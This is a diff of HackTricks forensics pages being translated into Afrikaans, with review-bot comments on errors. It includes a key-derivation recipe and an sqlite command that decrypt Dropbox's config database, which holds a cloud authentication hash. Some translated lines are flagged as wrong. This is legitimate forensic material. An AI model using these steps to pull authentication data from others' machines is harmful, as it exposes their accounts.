If everything goes as expected, the tool will indicate the **primary key** that you need to **use to recover the original one**. To recover the original one, just use this [cyber\_chef receipt](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) putting the primary key as the "passphrase" inside the receipt.
|
||||
|
||||
The resulting hex is the final key used to encrypt the databases which can be decrypted with:
|
||||
As alles soos verwag verloop, sal die instrument die **primêre sleutel** aandui wat jy moet **gebruik om die oorspronklike sleutel te herstel**. Om die oorspronklike sleutel te herstel, gebruik jy net hierdie [cyber\_chef-resep](https://gchq.github.io/CyberChef/#recipe=Derive\_PBKDF2\_key\(%7B'option':'Hex','string':'98FD6A76ECB87DE8DAB4623123402167'%7D,128,1066,'SHA1',%7B'option':'Hex','string':'0D638C092E8B82FC452883F95F355B8E'%7D\)) en plaas die primêre sleutel as die "wagwoord" binne die resep.
|
||||
|
||||
Die resulterende heks is die finale sleutel wat gebruik word om die databasisse te kripteer, wat ontsluit kan word met:
|
||||
```bash
|
||||
sqlite -k <Obtained Key> config.dbx ".backup config.db" #This decompress the config.dbx and creates a clear text backup in config.db
|
||||
```
|
||||
Die **`config.dbx`** databasis bevat:
|
||||
|
||||
The **`config.dbx`** database contains:
|
||||
* **E-pos**: Die e-pos van die gebruiker
|
||||
* **usernamedisplayname**: Die naam van die gebruiker
|
||||
* **dropbox\_path**: Pad waar die Dropbox-lys geleë is
|
||||
* **Host\_id: Hash** wat gebruik word om te verifieer by die wolk. Dit kan slegs vanaf die web herroep word.
|
||||
* **Root\_ns**: Gebruikersidentifiseerder
|
||||
|
||||
* **Email**: The email of the user
|
||||
* **usernamedisplayname**: The name of the user
|
||||
* **dropbox\_path**: Path where the dropbox folder is located
|
||||
* **Host\_id: Hash** used to authenticate to the cloud. This can only be revoked from the web.
|
||||
* **Root\_ns**: User identifier
|
||||
Die **`filecache.db`** databasis bevat inligting oor al die lêers en vouers wat met Dropbox gesinchroniseer is. Die tabel `File_journal` bevat die meeste nuttige inligting:
|
||||
|
||||
The **`filecache.db`** database contains information about all the files and folders synchronized with Dropbox. The table `File_journal` is the one with more useful information:
|
||||
* **Server\_path**: Pad waar die lêer binne die bediener geleë is (hierdie pad word voorafgegaan deur die `host_id` van die kliënt).
|
||||
* **local\_sjid**: Weergawe van die lêer
|
||||
* **local\_mtime**: Wysigingsdatum
|
||||
* **local\_ctime**: Skeppingsdatum
|
||||
|
||||
* **Server\_path**: Path where the file is located inside the server (this path is preceded by the `host_id` of the client).
|
||||
* **local\_sjid**: Version of the file
|
||||
* **local\_mtime**: Modification date
|
||||
* **local\_ctime**: Creation date
|
||||
Ander tabelle binne hierdie databasis bevat meer interessante inligting:
|
||||
|
||||
Other tables inside this database contain more interesting information:
|
||||
|
||||
* **block\_cache**: hash of all the files and folders of Dropbox
|
||||
* **block\_ref**: Related the hash ID of the table `block_cache` with the file ID in the table `file_journal`
|
||||
* **mount\_table**: Share folders of dropbox
|
||||
* **deleted\_fields**: Dropbox deleted files
|
||||
* **block\_cache**: hash van al die lêers en vouers van Dropbox
|
||||
* **block\_ref**: Verbind die hash-ID van die tabel `block_cache` met die lêer-ID in die tabel `file_journal`
|
||||
* **mount\_table**: Deel vouers van Dropbox
|
||||
* **deleted\_fields**: Dropbox verwyderde lêers
|
||||
* **date\_added**
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
|
|
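Review bot: "hives" is mistranslated as little bees in the Dropbox prerequisites list, `* Die **`SYSTEM`** en **`SECURITY`**-bytjies`; use `registerkorwe` or keep the technical term (`Die **`SYSTEM`**- en **`SECURITY`**-hives`). In the same region the bold markup after the DataProtectionDecryptor link is broken: `...dpapi\_data\_decryptor.html)** gebruik:**` opens strong emphasis with a leading space, so the asterisks render literally; move `gebruik` outside the bold (`...)** gebruik**:`). The dangling source fragment `Dropbox uses **SQLite databases** to manage the files. In this\` is an incomplete sentence and has been carried over verbatim as `In hierdie\`; finish or drop it rather than translating it. Smaller consistency points in the hunk: the placeholder inside inline code was translated (`\Users\<gebruikersnaam>\AppData\Local\Microsoft\OneDrive`) while `NTUSER.DAT\Software\Dropbox\ks\client` and the sqlite command stay English, so keep `<username>` untranslated in code spans; `gesinkroniseer` (OneDrive section) vs `gesinchroniseer` (filecache.db paragraph); `Dropbox-lys` for the dropbox folder should be `Dropbox-vouer`; `Deel vouers van Dropbox` for "Share folders" should be `Gedeelde vouers`; and the footer uses `haktruuks`/`github-opslag` where the header of the same file uses `hacktruuks`/`GitHub-opslagplekke`.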
@ -1,63 +1,58 @@
|
|||
# Office file analysis
|
||||
# Kantoorlêer-ontleding
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
|
||||
For further information check [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). This is just a sumary:
|
||||
Vir verdere inligting, kyk na [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/). Dit is net 'n opsomming:
|
||||
|
||||
Microsoft het baie kantoorlêer-formate geskep, met twee hooftipes, naamlik **OLE-formate** (soos RTF, DOC, XLS, PPT) en **Office Open XML (OOXML) formate** (soos DOCX, XLSX, PPTX). Hierdie formate kan makros insluit, wat hulle teikens maak vir hengel en kwaadwillige sagteware. OOXML-lêers is gestruktureer as zip-houers, wat inspeksie deur middel van uitpakkery moontlik maak, waar die lêer- en vouerhiërargie en XML-lêerinhoude onthul word.
|
||||
|
||||
Microsoft has created many office document formats, with two main types being **OLE formats** (like RTF, DOC, XLS, PPT) and **Office Open XML (OOXML) formats** (such as DOCX, XLSX, PPTX). These formats can include macros, making them targets for phishing and malware. OOXML files are structured as zip containers, allowing inspection through unzipping, revealing the file and folder hierarchy and XML file contents.
|
||||
Om OOXML-lêerstrukture te verken, word die opdrag om 'n dokument uit te pak en die uitsetstruktuur gegee. Tegnieke vir die versteek van data in hierdie lêers is gedokumenteer, wat voortdurende innovasie in data-versteek binne CTF-uitdagings aandui.
|
||||
|
||||
To explore OOXML file structures, the command to unzip a document and the output structure are given. Techniques for hiding data in these files have been documented, indicating ongoing innovation in data concealment within CTF challenges.
|
||||
|
||||
For analysis, **oletools** and **OfficeDissector** offer comprehensive toolsets for examining both OLE and OOXML documents. These tools help in identifying and analyzing embedded macros, which often serve as vectors for malware delivery, typically downloading and executing additional malicious payloads. Analysis of VBA macros can be conducted without Microsoft Office by utilizing Libre Office, which allows for debugging with breakpoints and watch variables.
|
||||
|
||||
Installation and usage of **oletools** are straightforward, with commands provided for installing via pip and extracting macros from documents. Automatic execution of macros is triggered by functions like `AutoOpen`, `AutoExec`, or `Document_Open`.
|
||||
Vir ontleding bied **oletools** en **OfficeDissector** omvattende gereedskapstelle vir die ondersoek van beide OLE- en OOXML-dokumente. Hierdie gereedskap help om ingebedde makros te identifiseer en te analiseer, wat dikwels as vektore vir kwaadwillige sagteware-aflewering dien, wat tipies aanvullende skadelike lading aflaai en uitvoer. Analise van VBA-makros kan uitgevoer word sonder Microsoft Office deur gebruik te maak van Libre Office, wat voorsiening maak vir foutopsporing met breekpunte en kykveranderlikes.
|
||||
|
||||
Die installasie en gebruik van **oletools** is eenvoudig, met opdragte wat voorsien word vir installasie via pip en die onttrekking van makros uit dokumente. Outomatiese uitvoering van makros word geaktiveer deur funksies soos `AutoOpen`, `AutoExec`, of `Document_Open`.
|
||||
```bash
|
||||
sudo pip3 install -U oletools
|
||||
olevba -c /path/to/document #Extract macros
|
||||
```
|
||||
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
|
||||
|
||||
</details>
|
||||
|
|
|
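Review bot: The paragraph `Om OOXML-lêerstrukture te verken, word die opdrag om 'n dokument uit te pak en die uitsetstruktuur gegee.` promises an unzip command and its output structure, but neither the old nor the new text contains one (the only command shown is `olevba -c /path/to/document #Extract macros`); either add the `unzip` invocation with its listing or drop the claim instead of carrying it into the translation. The shared banner is also translated two different ways inside this one file: `github-repos.` at the top versus `github-repositoriums.` at the bottom, and `As jy wil sien dat jou **maatskappy geadverteer word in HackTricks**` versus `As jy jou **maatskappy in HackTricks wil adverteer**`; the header/footer block should come from one template so every page reads the same. Minor wording: `hengel` reads as literal fishing, and `phishing` is normally kept as a loanword; `uitpakkery` for unzipping is unusual (`uitpak`).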
@ -1,52 +1,52 @@
|
|||
# PDF File analysis
|
||||
# PDF-lêerontleding
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
<figure><img src="../../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
Get Access Today:
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\
|
||||
Kry vandag toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
**For further details check: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)**
|
||||
**Vir verdere besonderhede, kyk na: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)**
|
||||
|
||||
The PDF format is known for its complexity and potential for concealing data, making it a focal point for CTF forensics challenges. It combines plain-text elements with binary objects, which might be compressed or encrypted, and can include scripts in languages like JavaScript or Flash. To understand PDF structure, one can refer to Didier Stevens's [introductory material](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), or use tools like a text editor or a PDF-specific editor such as Origami.
|
||||
Die PDF-formaat is bekend vir sy kompleksiteit en potensiaal om data te verberg, wat dit 'n fokuspunt maak vir CTF-forensiese uitdagings. Dit kombineer plain-tekstelemente met binêre voorwerpe, wat moontlik saamgedruk of versleutel kan wees, en kan skripte in tale soos JavaScript of Flash insluit. Om die PDF-struktuur te verstaan, kan verwys word na Didier Stevens se [inleidende materiaal](https://blog.didierstevens.com/2008/04/09/quickpost-about-the-physical-and-logical-structure-of-pdf-files/), of gebruik maak van hulpmiddels soos 'n teksredigeerder of 'n PDF-spesifieke redigeerder soos Origami.
|
||||
|
||||
For in-depth exploration or manipulation of PDFs, tools like [qpdf](https://github.com/qpdf/qpdf) and [Origami](https://github.com/mobmewireless/origami-pdf) are available. Hidden data within PDFs might be concealed in:
|
||||
Vir diepgaande verkenning of manipulasie van PDF's is hulpmiddels soos [qpdf](https://github.com/qpdf/qpdf) en [Origami](https://github.com/mobmewireless/origami-pdf) beskikbaar. Versteekte data binne PDF's kan verskuil wees in:
|
||||
|
||||
* Invisible layers
|
||||
* XMP metadata format by Adobe
|
||||
* Incremental generations
|
||||
* Text with the same color as the background
|
||||
* Text behind images or overlapping images
|
||||
* Non-displayed comments
|
||||
* Onsigbare lae
|
||||
* XMP-metadata-formaat deur Adobe
|
||||
* Inkrementele generasies
|
||||
* Teks met dieselfde kleur as die agtergrond
|
||||
* Teks agter beelde of oorvleuelende beelde
|
||||
* Nie-vertoonde kommentaar
|
||||
|
||||
For custom PDF analysis, Python libraries like [PeepDF](https://github.com/jesparza/peepdf) can be used to craft bespoke parsing scripts. Further, the PDF's potential for hidden data storage is so vast that resources like the NSA guide on PDF risks and countermeasures, though no longer hosted at its original location, still offer valuable insights. A [copy of the guide](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) and a collection of [PDF format tricks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) by Ange Albertini can provide further reading on the subject.
|
||||
Vir aangepaste PDF-ontleding kan Python-biblioteke soos [PeepDF](https://github.com/jesparza/peepdf) gebruik word om spesiale ontledingsskripte te skep. Verder is die potensiaal van die PDF vir versteekte data-opberging so groot dat bronne soos die NSA-gids oor PDF-risiko's en teenmaatreëls, alhoewel dit nie meer by sy oorspronklike plek gehuisves word nie, steeds waardevolle insigte bied. 'n [Afskrif van die gids](http://www.itsecure.hu/library/file/Biztons%C3%A1gi%20%C3%BAtmutat%C3%B3k/Alkalmaz%C3%A1sok/Hidden%20Data%20and%20Metadata%20in%20Adobe%20PDF%20Files.pdf) en 'n versameling [PDF-formaat-truuks](https://github.com/corkami/docs/blob/master/PDF/PDF.md) deur Ange Albertini kan verdere leesstof oor die onderwerp bied.
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
|
|
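Review bot: the shared footer block is translated differently in this file than in the other files of the same commit, so the `<details>` boilerplate will drift per page. Here the bullets read "SUBSKRIPSIEPLANNE", "PEASS & HackTricks-uitrusting" and "NFT's" (lines starting `* As jy wil sien`, `* Kry die`, `* Ontdek`), while the PNG, audio/video and Windows Artifacts hunks further down keep "SUBSCRIPTION PLANS", "swag" and "NFTs", and the last one writes "github-repos" where this file writes "GitHub-opslagplekke". Settle on one rendering of the footer and paste it verbatim into every file, otherwise a later mass edit of the boilerplate will miss some pages.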
@ -1,37 +1,33 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
**PNG files** are highly regarded in **CTF challenges** for their **lossless compression**, making them ideal for embedding hidden data. Tools like **Wireshark** enable the analysis of PNG files by dissecting their data within network packets, revealing embedded information or anomalies.
|
||||
**PNG-lêers** word hoog aangeskryf in **CTF-uitdagings** vir hul **verlieslose kompressie**, wat hulle ideaal maak vir die insluiting van verborge data. Hul data kan ontleed word deur hul netwerkpakketten met behulp van hul gereedskap soos **Wireshark**, wat ingebedde inligting of anomalieë kan onthul.
|
||||
|
||||
For checking PNG file integrity and repairing corruption, **pngcheck** is a crucial tool, offering command-line functionality to validate and diagnose PNG files ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). When files are beyond simple fixes, online services like [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) provide a web-based solution for **repairing corrupted PNGs**, aiding in the recovery of crucial data for CTF participants.
|
||||
